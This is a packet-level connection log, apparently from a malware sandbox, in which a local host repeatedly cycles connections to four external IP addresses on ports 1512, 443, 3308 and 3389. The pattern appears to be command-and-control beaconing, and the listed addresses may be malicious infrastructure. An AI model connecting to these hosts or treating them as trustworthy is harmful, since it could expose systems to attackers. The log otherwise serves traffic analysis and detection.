Jan 12, 2021 01:45:34.796031952 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.899590015 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.899630070 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:34.899955034 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.905455112 CET	49340	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:34.958354950 CET	1512	49340	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:35.014753103 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.066864014 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.067001104 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.068856001 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.120604992 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.135796070 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.135988951 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.152143955 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.206489086 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.206739902 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.216833115 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.217210054 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.269057989 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.269279957 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.307310104 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.321177959 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.437727928 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.437772989 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.438057899 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.443537951 CET	49341	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:35.495312929 CET	443	49341	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:35.560911894 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.604193926 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.604501963 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.606004953 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.649205923 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.659719944 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.659753084 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.659813881 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.659837008 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.677007914 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.722004890 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.722193003 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.732593060 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.732964039 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.776225090 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.776571035 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.820067883 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.932215929 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.932259083 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:35.932529926 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.937928915 CET	49342	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:35.981281996 CET	3308	49342	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:36.063213110 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.117419004 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.117526054 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.118268967 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.176474094 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.196981907 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.197021008 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.197113037 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.199033022 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.211556911 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.282038927 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.282466888 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.292584896 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.292730093 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.347019911 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.347373962 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.387012959 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.402134895 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.402174950 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.494967937 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.495016098 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.495187998 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.500296116 CET	49343	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:36.554846048 CET	3389	49343	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:36.621906996 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.674830914 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.675008059 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.676642895 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.729502916 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.736394882 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.736427069 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.736670971 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.750962019 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.805088043 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.805475950 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.831393003 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.831882000 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.884944916 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:36.885277987 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:36.938283920 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:37.036155939 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:37.036199093 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:37.036459923 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:37.041934013 CET	49344	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:37.094909906 CET	1512	49344	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:37.153443098 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.205322981 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.205519915 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.207120895 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.258852959 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.273354053 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.273540974 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.289634943 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.343833923 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.344234943 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.353943110 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.354219913 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.405900955 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.406196117 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.443360090 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.458226919 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.458272934 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.575598001 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.575650930 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.576000929 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.581584930 CET	49345	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:37.633378983 CET	443	49345	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:37.698297024 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.741600990 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.741796970 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.743294954 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.786441088 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.800934076 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.800973892 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.801105022 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.801156998 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.815782070 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.861463070 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.861701965 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.871712923 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.872028112 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.915241957 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.915591955 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:37.955404043 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.958959103 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:37.959002018 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:38.071675062 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:38.071722031 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:38.072050095 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:38.077579975 CET	49346	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:38.120845079 CET	3308	49346	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:38.194473982 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.248425961 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.248554945 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.249928951 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.303653955 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.336189032 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.336236000 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.336292982 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.336333036 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.343087912 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.411436081 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.411544085 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.415461063 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.415507078 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.469638109 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.469964027 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.509522915 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.524204969 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.524251938 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.614335060 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.614372015 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.614622116 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.614664078 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.620260954 CET	49347	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:38.675528049 CET	3389	49347	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:38.743690968 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.796822071 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.797036886 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.798670053 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.851495028 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.858149052 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.858189106 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.858455896 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.872567892 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.926784992 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.927067041 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.937134981 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.937427998 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:38.990392923 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:38.990771055 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:39.026614904 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:39.044028044 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:39.145375967 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:39.145535946 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:39.145689964 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:39.145742893 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:39.152026892 CET	49348	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:39.205121994 CET	1512	49348	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:39.273708105 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.325757980 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.325978994 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.327701092 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.379549026 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.394809008 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.395050049 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.408821106 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.463375092 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.463788986 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.473773956 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.473977089 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.525938034 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.526263952 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.578275919 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.697349072 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.697478056 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.698335886 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.703943014 CET	49349	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:39.756736994 CET	443	49349	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:39.820187092 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.863544941 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:39.863766909 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.865319967 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.908550024 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:39.922133923 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:39.922190905 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:39.922288895 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.923338890 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.938388109 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.983361006 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:39.983593941 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.993571043 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:39.993952036 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:40.037255049 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:40.037451982 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:40.080805063 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:40.194251060 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:40.194308043 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:40.194617987 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:40.200254917 CET	49350	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:40.243519068 CET	3308	49350	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:40.318862915 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.372896910 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.373030901 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.374851942 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.433434963 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.450447083 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.450509071 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.450619936 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.450674057 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.464653015 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.526506901 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.526793957 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.537146091 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.537298918 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.591492891 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.591603041 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.631586075 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.645777941 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.645823002 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.737287998 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.737346888 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.737415075 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.737447023 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.740658045 CET	49351	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:40.795207024 CET	3389	49351	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:40.854298115 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:40.907537937 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:40.907718897 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:40.909369946 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:40.962419987 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:40.969477892 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:40.969527960 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:40.969662905 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:40.969715118 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:40.983340979 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.037700891 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.038031101 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.048122883 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.048523903 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.101696968 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.102051973 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.138710022 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.155273914 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.256230116 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.256273985 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.256604910 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.262131929 CET	49352	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:41.315314054 CET	1512	49352	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:41.381223917 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.433465004 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.433655977 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.435472012 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.487317085 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.501972914 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.502099037 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.516264915 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.570522070 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.570852995 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.580939054 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.581367970 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.633606911 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.633831978 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.685892105 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.804049969 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.804106951 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.804335117 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.810034990 CET	49353	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:41.862061977 CET	443	49353	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:41.926253080 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:41.969733000 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:41.969871998 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:41.971575975 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.014672995 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.028269053 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.028331041 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.028397083 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.028446913 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.042881966 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.087925911 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.088088989 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.098124027 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.098388910 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.141591072 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.141844034 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.182446957 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.185178995 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.185262918 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.304214001 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.304332972 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.304583073 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.310381889 CET	49354	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:42.353669882 CET	3308	49354	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:42.422380924 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.476794004 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.476928949 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.478425980 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.532824993 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.553433895 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.553513050 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.553566933 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.553612947 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.567496061 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.632335901 CET	3389	49355	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:42.632590055 CET	49355	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:42.642400026 CET	49355	3389	192.168.2.22	5.100.228.233
